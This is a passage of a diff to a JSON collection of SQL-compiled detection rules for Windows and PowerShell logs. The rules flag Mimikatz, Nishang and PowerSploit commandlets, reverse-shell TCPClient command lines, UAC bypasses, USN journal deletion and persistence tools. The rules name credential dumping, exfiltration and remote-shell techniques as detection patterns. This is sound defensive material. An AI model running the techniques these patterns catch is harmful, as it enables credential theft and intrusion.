OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - 